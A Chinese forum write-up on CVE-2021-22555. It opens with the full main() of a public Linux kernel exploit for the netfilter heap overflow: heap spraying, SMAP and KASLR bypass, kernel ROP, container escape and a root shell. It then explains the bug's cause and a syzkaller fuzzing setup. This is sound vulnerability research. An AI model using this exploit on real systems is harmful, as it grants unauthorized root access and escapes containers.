  struct pipe_buf_operations *ops;
  struct pipe_buffer *buf;
 
  uint64_t pipe_buffer_ops = 0;
  uint64_t kheap_addr = 0, kbase_addr = 0;
 
  int fake_idx = -1, real_idx = -1;
 
  printf("[+] Linux Privilege Escalation by theflow@ - 2021\n");
 
  printf("\n");
  printf("[+] STAGE 0: Initialization\n");
 
  printf("[*] Setting up namespace sandbox...\n");
  if (setup_sandbox() < 0)
    goto err_no_rmid;
 
  printf("[*] Initializing sockets and message queues...\n");
 
  if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("[-] socket");
    goto err_no_rmid;
  }
 
  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, ss[i]) < 0) {
      perror("[-] socketpair");
      goto err_no_rmid;
    }
  }
 
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
      perror("[-] msgget");
      goto err_no_rmid;
    }
  }
 
  printf("\n");
  printf("[+] STAGE 1: Memory corruption\n");
 
  printf("[*] Spraying primary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_primary, 0, sizeof(msg_primary));
    *(int *)&msg_primary.mtext[0] = MSG_TAG;
    *(int *)&msg_primary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }
 
  printf("[*] Spraying secondary messages...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    memset(&msg_secondary, 0, sizeof(msg_secondary));
    *(int *)&msg_secondary.mtext[0] = MSG_TAG;
    *(int *)&msg_secondary.mtext[4] = i;
    if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                  MTYPE_SECONDARY) < 0)
      goto err_rmid;
  }
 
  printf("[*] Creating holes in primary messages...\n");
  for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
    if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) <
        0)
      goto err_rmid;
  }
 
  printf("[*] Triggering out-of-bounds write...\n");
  if (trigger_oob_write(s) < 0)
    goto err_rmid;
 
  printf("[*] Searching for corrupted primary message...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i != 0 && (i % HOLE_STEP) == 0)
      continue;
    if (peek_msg(msqid[i], &msg_secondary, sizeof(msg_secondary), 1) < 0)
      goto err_no_rmid;
    if (*(int *)&msg_secondary.mtext[0] != MSG_TAG) {
      printf("[-] Error could not corrupt any primary message.\n");
      goto err_no_rmid;
    }
    if (*(int *)&msg_secondary.mtext[4] != i) {
      fake_idx = i;
      real_idx = *(int *)&msg_secondary.mtext[4];
      break;
    }
  }
 
  if (fake_idx == -1 && real_idx == -1) {
    printf("[-] Error could not corrupt any primary message.\n");
    goto err_no_rmid;
  }
 
  // fake_idx's primary message has a corrupted next pointer; wrongly
  // pointing to real_idx's secondary message.
  printf("[+] fake_idx: %x\n", fake_idx);
  printf("[+] real_idx: %x\n", real_idx);
 
  printf("\n");
  printf("[+] STAGE 2: SMAP bypass\n");
 
  printf("[*] Freeing real secondary message...\n");
  if (read_msg(msqid[real_idx], &msg_secondary, sizeof(msg_secondary),
               MTYPE_SECONDARY) < 0)
    goto err_rmid;
 
  // Reclaim the previously freed secondary message with a fake msg_msg of
  // maximum possible size.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                PAGE_SIZE - MSG_MSG_SIZE, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  // Use the fake secondary message to read out-of-bounds.
  printf("[*] Leaking adjacent secondary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;
 
  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak adjacent secondary message.\n");
    goto err_rmid;
  }
 
  // The secondary message contains a pointer to the primary message.
  msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (PRIMARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
 
  if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }
 
  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));
 
  // Put kheap_addr at next to leak its content. Assumes zero bytes before
  // kheap_addr.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  // Use the fake secondary message to read from kheap_addr.
  printf("[*] Leaking primary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;
 
  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak primary message.\n");
    goto err_rmid;
  }
 
  // The primary message contains a pointer to the secondary message.
  msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (SECONDARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
 
  // Calculate the address of the fake secondary message.
  kheap_addr -= SECONDARY_SIZE;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
 
  if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }
 
  printf("\n");
  printf("[+] STAGE 3: KASLR bypass\n");
 
  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));
 
  // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  printf("[*] Freeing sk_buff data buffer...\n");
  if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto err_rmid;
 
  printf("[*] Spraying pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (pipe(pipefd[i]) < 0) {
      perror("[-] pipe");
      goto err_rmid;
    }
    // Write something to populate pipe_buffer.
    if (write(pipefd[i][1], "pwn", 3) < 0) {
      perror("[-] write");
      goto err_rmid;
    }
  }
 
  printf("[*] Leaking and freeing pipe_buffer object...\n");
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
        perror("[-] read");
        goto err_rmid;
      }
      if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
        pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
    }
  }
 
  kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;
  printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
  printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);
 
  if ((kbase_addr & 0xFFFF0000000FFFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel base address is incorrect.\n");
    goto err_rmid;
  }
 
  printf("\n");
  printf("[+] STAGE 4: Kernel code execution\n");
 
  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }
 
  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);
  printf("[+] Root privileges gained.\n");
 
  printf("\n");
  printf("[+] STAGE 5: Post-exploitation\n");
 
  printf("[*] Escaping container...\n");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);
 
  printf("[*] Cleaning up...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    // TODO: Fix next pointer.
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }
  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (close(ss[i][0]) < 0)
      perror("[-] close");
    if (close(ss[i][1]) < 0)
      perror("[-] close");
  }
  if (close(s) < 0)
    perror("[-] close");
 
  printf("[*] Popping root shell...\n");
  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);
 
  return 0;
 
err_rmid:
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }
 
err_no_rmid:
  return 1;
}

编译命令如下

1
gcc poc.c -m32 -o poc

对于exp的解读以及漏洞成因的分析

1
2
3
4
5
6
7
8
#define NUM_MSQIDS 4096
 
for (int i = 0; i < NUM_MSQIDS; i++) {
  if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
    perror("[-] msgget");
    goto err_no_rmid;
  }
}

此处申请了4096个消息队列主要是为了堆喷的稳定和利用的稳定(后面会提),一般来说,堆喷的利用文章都会提到喷得越多,利用越稳定,可是很少提及为什么越多越稳定,此处我认为可以引用CTFwiki上的介绍内容,内核代码很有可能在不同CPU核心上运行,而slub算法在不同核心上分配的内存也是不一样的,假设喷得不够多的情况下,exp在堆喷的时候用的是CPU0,而后面利用时却跑到了CPU1,就会导致利用失败

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 int setup_sandbox(void) {
  if (unshare(CLONE_NEWUSER) < 0) {
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }
  if (unshare(CLONE_NEWNET) < 0) {
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }
 
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
    perror("[-] sched_setaffinity");
    return -1;
  }
 
  return 0;
}
 
printf("[*] Setting up namespace sandbox...\n");
if (setup_sandbox() < 0)
  goto err_no_rmid;

main函数开头的这一段也是为了将进程绑定到固定核心上,以提高堆喷稳定性

接下来需要创建对应的主消息和辅助消息并向其中填充数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}
 
printf("[*] Spraying primary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
  memset(&msg_primary, 0, sizeof(msg_primary));
  *(int *)&msg_primary.mtext[0] = MSG_TAG;
  *(int *)&msg_primary.mtext[4] = i;
  if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
    goto err_rmid;
}
 
printf("[*] Spraying secondary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
  memset(&msg_secondary, 0, sizeof(msg_secondary));
  *(int *)&msg_secondary.mtext[0] = MSG_TAG;
  *(int *)&msg_secondary.mtext[4] = i;
  if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
MTYPE_SECONDARY) < 0)
    goto err_rmid;
}

mtext[0]=MSG_TAG用于标识某段区域的作用是否为堆喷

mtext[4]=i用于标识内存区id

此时的消息队列排列应该如下图所示

2.png

此处采用了官方文档图片(主要是我找不到好的画图软件)

1
2
3
4
5
6
7
8
9
10
11
12
13
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}
 
printf("[*] Creating holes in primary messages...\n");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
  if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
      goto err_rmid;
}

紧接着是释放部分主消息,事实上只释放了三个主消息,1024、2048、3072

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
int trigger_oob_write(int s) {
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};
 
  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));
 
  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));
 
  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;
 
  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;
 
  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }
  return 0;
}
 
printf("[*] Triggering out-of-bounds write...\n");
if (trigger_oob_write(s) < 0)
  goto err_rmid;

调用setsockopt(IPT_SO_SET_REPLACE)会直接触发两字节溢出写0,之前连续申请了4096个消息队列也是为了能让消息队列所在的内存是连续的,其实最重要的是能让辅助消息队列所在的内存是连续的,因为触发的是两字节写0,也就是说主消息对应的辅助消息如果原本内存地址不为0的情况下,触发漏洞过后,会有两个主消息指向同一个辅助消息,也就是从上面的图变成了下图

4.png

有些教程认为在触发漏洞时,中间还有个如下图所示的状态

3.png

从漏洞原理以及触发条件来看,我认为这种状态并不需要特别注意,在调用setsockopt函数时,内核中确实是先创建了xt_table_info,然后在八字节对齐时产生两字节溢出,但是从用户态看来,调用完setsockopt函数后就直接发生了溢出;总之,这种中间状态存在时间非常短,可以忽略不计,但对理解漏洞形成流程还是有帮助的

至此,我们已经触发了这个漏洞,根据之前所做的内容来看,触发漏洞更需要几个条件;首先需要将代码编译成32位程序,并且在64位系统上运行;其次需要编译x_tables和ip6_tables这两个内核模块,最后需要在调用setsockopt时加上一些特别的字段;32位系统调用setsockopt(IPT_SO_SET_REPLACE)函数最终会走到内核的 __compat_sys_setsockopt 函数中,这点也可以从之前kasan的输出信息中看到

1
[ 1185.206655]  __compat_sys_setsockopt+0x139/0x330

关于setsockopt的内核调用流程十分复杂(我太菜了),且与漏洞原理本身无关(适当的了解还是有必要的,可以加深对Linux内核的理解),所以就直接从漏洞点来分析

1
2
[ 1185.205993] BUG: KASAN: slab-out-of-bounds in xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206433]  compat_do_replace.isra.0+0x160/0x380 [ip6_tables]

漏洞点实际是从compat_do_replace函数开始便存在了,并在xt_compat_target_from_user函数中被触发

先看一下compat_do_replace函数代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static int
compat_do_replace(struct net *net, void __user *user, unsigned int len)
{
    int ret;
    struct compat_ip6t_replace tmp;
    struct xt_table_info *newinfo;
    void *loc_cpu_entry;
    struct ip6t_entry *iter;
 
    if (copy_from_user(&tmp, user, sizeof(tmp)) != 0)
        return -EFAULT;
 
    /* overflow check */
    if (tmp.num_counters >= INT_MAX / sizeof(struct xt_counters))
        return -ENOMEM;
    if (tmp.num_counters == 0)
        return -EINVAL;
 
    tmp.name[sizeof(tmp.name)-1] = 0;
 
    newinfo = xt_alloc_table_info(tmp.size);
    if (!newinfo)
        return -ENOMEM;
 
    loc_cpu_entry = newinfo->entries;
    if (copy_from_user(loc_cpu_entry, user + sizeof(tmp),
               tmp.size) != 0) {
        ret = -EFAULT;
        goto free_newinfo;
    }
 
    ret = translate_compat_table(net, &newinfo, &loc_cpu_entry, &tmp);
    if (ret != 0)
        goto free_newinfo;
 
    ret = __do_replace(net, tmp.name, tmp.valid_hooks, newinfo,
               tmp.num_counters, compat_ptr(tmp.counters));
    if (ret)
        goto free_newinfo_untrans;
    return 0;
 
 free_newinfo_untrans:
    xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
        cleanup_entry(iter, net);
 free_newinfo:
    xt_free_table_info(newinfo);
    return ret;
}

从上面trigger_oob_write函数中的漏洞触发代码来看,struct compat_ip6t_replace tmp 对应着 struct ip6t_replace replace

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
    struct xt_table_info *info = NULL;
    size_t sz = sizeof(*info) + size;
 
    if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
        return NULL;
 
    info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
    if (!info)
        return NULL;
 
    memset(info, 0, sizeof(*info));
    info->size = size;
    return info;
}
EXPORT_SYMBOL(xt_alloc_table_info);

注意此处的kvmalloc,这与漏洞产生原因有关,后面会提到

而newinfo则是xt_table_info头加如下一堆结构体

1
2
3
4
struct ipt_entry entry;
struct xt_entry_match match;
char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
struct xt_entry_target target;

最后在调用translate_compat_table函数时给的&loc_cpu_entry指针则是指向xt_table_info结构体里的可变长度结构体entries

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* The table itself */
struct xt_table_info {
    /* Size per table */
    unsigned int size;
    /* Number of entries: FIXME. --RR */
    unsigned int number;
    /* Initial number of entries. Needed for module usage count */
    unsigned int initial_entries;
 
    /* Entry points and underflows */
    unsigned int hook_entry[NF_INET_NUMHOOKS];
    unsigned int underflow[NF_INET_NUMHOOKS];
 
    /*
     * Number of user chains. Since tables cannot have loops, at most
     * @stacksize jumps (number of user chains) can possibly be made.
     */
    unsigned int stacksize;
    void ***jumpstack;
 
    unsigned char entries[] __aligned(8);
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
static int
translate_compat_table(struct net *net,
               struct xt_table_info **pinfo,
               void **pentry0,
               const struct compat_ip6t_replace *compatr)
{
    unsigned int i, j;
    struct xt_table_info *newinfo, *info;
    void *pos, *entry0, *entry1;
    struct compat_ip6t_entry *iter0;
    struct ip6t_replace repl;
    unsigned int size;
    int ret;
 
    info = *pinfo;
    entry0 = *pentry0;
    size = compatr->size;
    info->number = compatr->num_entries;
 
    j = 0;
    xt_compat_lock(AF_INET6);
    ret = xt_compat_init_offsets(AF_INET6, compatr->num_entries);
    if (ret)
        goto out_unlock;
    /* Walk through entries, checking offsets. */
    xt_entry_foreach(iter0, entry0, compatr->size) {
        ret = check_compat_entry_size_and_hooks(iter0, info, &size,
                            entry0,
                            entry0 + compatr->size);
        if (ret != 0)
            goto out_unlock;
        ++j;
    }
 
    ret = -EINVAL;
    if (j != compatr->num_entries)
        goto out_unlock;
 
    ret = -ENOMEM;
    newinfo = xt_alloc_table_info(size);
    if (!newinfo)
        goto out_unlock;
 
    newinfo->number = compatr->num_entries;
    for (i = 0; i < NF_INET_NUMHOOKS; i++) {
        newinfo->hook_entry[i] = compatr->hook_entry[i];
        newinfo->underflow[i] = compatr->underflow[i];
    }
    entry1 = newinfo->entries;
    pos = entry1;
    size = compatr->size;
    xt_entry_foreach(iter0, entry0, compatr->size)
        compat_copy_entry_from_user(iter0, &pos, &size,
                        newinfo, entry1);
 
    /* all module references in entry0 are now gone. */
    xt_compat_flush_offsets(AF_INET6);
    xt_compat_unlock(AF_INET6);
 
    memcpy(&repl, compatr, sizeof(*compatr));
 
    for (i = 0; i < NF_INET_NUMHOOKS; i++) {
        repl.hook_entry[i] = newinfo->hook_entry[i];
        repl.underflow[i] = newinfo->underflow[i];
    }
 
    repl.num_counters = 0;
    repl.counters = NULL;
    repl.size = newinfo->size;
    ret = translate_table(net, newinfo, entry1, &repl);
    if (ret)
        goto free_newinfo;
 
    *pinfo = newinfo;
    *pentry0 = entry1;
    xt_free_table_info(info);
    return 0;
 
free_newinfo:
    xt_free_table_info(newinfo);
    return ret;
out_unlock:
    xt_compat_flush_offsets(AF_INET6);
    xt_compat_unlock(AF_INET6);
    xt_entry_foreach(iter0, entry0, compatr->size) {
        if (j-- == 0)
            break;
        compat_release_entry(iter0);
    }
    return ret;
}

简单的形容translate_compat_table函数的作用就是将32位的结构体传到entry0中,然后申请一个和entry0同样大小的entry1  64位结构体,然后将entry0赋值给entry1(注意,此时entry0中的内容不做修改,只是从32位转到了64位而已),到此为止KASAN的信息就不全了,此处的调用链+应该是 translate_compat_table -> compat_copy_entry_from_user -> xt_compat_target_from_user,中间的函数不怎么重要,主要就是参数传递的过程,重要的是xt_compat_target_from_user函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
{
    const struct xt_target *target = t->u.kernel.target;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;
    char name[sizeof(t->u.user.name)];
 
    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
    else
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);
 
    tsize += off;
    t->u.user.target_size = tsize;
    strlcpy(name, target->name, sizeof(name));
    module_put(target->me);
    strncpy(t->u.user.name, name, sizeof(t->u.user.name));
 
    *size += off;
    *dstptr += tsize;
}

此处需要注意pad变量,在赋值时,代码作者想要进行8字节对齐,但是在上面xt_alloc_table_info函数在申请内存时,并没有进行8字节对齐,这意味着在memset置零的时候可能会将0写到下一个堆块中(溢出后产生的效果可以参考上面的图片)

此时漏洞形成的大致原理就已经清楚了,在64位系统中执行32位的含有socket的代码(漏洞触发代码参考trigger_oob_write函数),所以要想通过syzkaller来检测到此漏洞,就需要使用64位的内核来运行32位的样本

模糊测试

系统配置

需要开启CPU虚拟化

8G内存(内存需要尽可能大)

40G硬盘(看网上说的,应该够用)

前置工作

安装一些依赖包

1
apt-get install dwarves debootstrap make gcc flex bison libncurses-dev libelf-dev libssl-dev g++ git g++-multilib

根据GitHub上给出的错误修改提示和一些必须的配置修改.config文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Coverage collection.
CONFIG_KCOV=y
 
# Debug info for symbolization.
CONFIG_DEBUG_INFO_DWARF4=y
 
# Memory bug detector
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
 
# Required for Debian Stretch and later
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
 
CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="net.ifnames=0"
 
CONFIG_BINFMT_MISC=y
CONFIG_FRAME_WARN=4096
CONFIG_SYSTEM_TRUSTED_KEYS=""
CONFIG_E1000=y
CONFIG_IP6_NF_IPTABLES=y

还有一些代码需要修改

将/include/linux/compiler.h头文件第392行注释掉,这个错误不知道为什么会被触发,我看了更新版本的内核,这行还是在的,可能是我机器的玄学问题

1
//_compiletime_assert(condition, msg, __compiletime_assert_, __COUNTER__)

修改/tools/objtool/elf.c中第356行的if判断,直接改为return 0,这个问题是根据GitHub上的patch代码修改的,事实上新版本的内核也直接改为return 0了

1
2
3
4
5
if (!symtab) {
    //WARN("missing symbol table");
    //return -1;
    return 0;
}

以上需要修改的源码内容是在Ubuntu22.04上编译5.8.1内核的时候必要的修改,如果使用的是20.04则不需要对源码做修改,只需要修改.config文件就可以了

然后需要修改一下syzkaller的源码内容

此处需要找到qemu.go文件,将如下内容

1
2
3
4
5
6
7
8
9
"linux/386": {
        Qemu:   "qemu-system-i386",
        NetDev: "e1000",
        RngDev: "virtio-rng-pci",
        CmdLine: []string{
                "root=/dev/sda",
                "console=ttyS0",
        },
},

修改为

1
2
3
4
5
6
7
8
9
"linux/386": {
        Qemu:   "qemu-system-x86_64",
        NetDev: "e1000",
        RngDev: "virtio-rng-pci",
        CmdLine: []string{
                "root=/dev/sda",
                "console=ttyS0",
        },
},

修改完成后需要重新编译syzkaller,编译完成后直接运行就好

运行之前需要写一些syzkaller的配置文件,并下载镜像文件

1
wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
    "target": "linux/386",
    "http": "0.0.0.0:8080",
    "workdir": "/root/image/ip6/",
    "kernel_obj": "/root/linux-5.8.1/",
    "image": "/root/image/bullseye.img",
    "sshkey": "/root/image/bullseye.id_rsa",
    "syzkaller": "/root/syzkaller",
    "procs": 2,
    "type": "qemu",
    "vm": {
        "count": 6,
        "kernel": "/root/linux-5.8.1/arch/x86/boot/bzImage",
        "cpu": 2,
        "mem": 1024
    }
}

这里target给的是386是因为之前修改了syzkaller源码,所以实际运行的是64位的系统,只不过syzkaller喂的是32位的样本

下面的目录都是根据实际工作目录填写;count、cpu和mem参数,则分别代表虚拟机数、CPU数和内存大小,这些根据实际物理机配置需要尽可能大一些
之后就可以使用syz-manager开始fuzz了,这里的config文件则是上面自己修改的config文件

第一次使用syzkaller可能会有些疑惑,为什么运行一段时间后所有的虚拟机都停了,这是因为syzkaller每隔一段时间就需要验证跑出来的crash,并生成C代码

总之fuzz时,耐心等待即可

结尾

其实fuzz部分文章去年十一月就差不多完成了,但是因为工作变故,导致拖延了很久,总之最后能发出来就是好的,另外漏洞本身除了fuzz部分还有利用部分,所以此文章应该还有一篇,等有空了就给大家鸽出来吧


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2024-6-11 10:33 被pureGavin编辑 ,原因: 增加内容
收藏
免费 0
打赏
分享
最新回复 (1)
雪    币: 12482
活跃值: (15882)
能力值: ( LV12,RANK:250 )
在线值:
发帖
回帖
粉丝
pureGavin 2 2024-6-7 09:46
2
0
fuzz需要的时间非常久,我甚至出现了fuzz出很多其他的漏洞,却没有找到CVE-2021-22555这个漏洞,事实上fuzz本身就是一个耗时很久的工作,好在相比起后面的漏洞利用,fuzz部分还算简单
游客
登录 | 注册 方可回帖
返回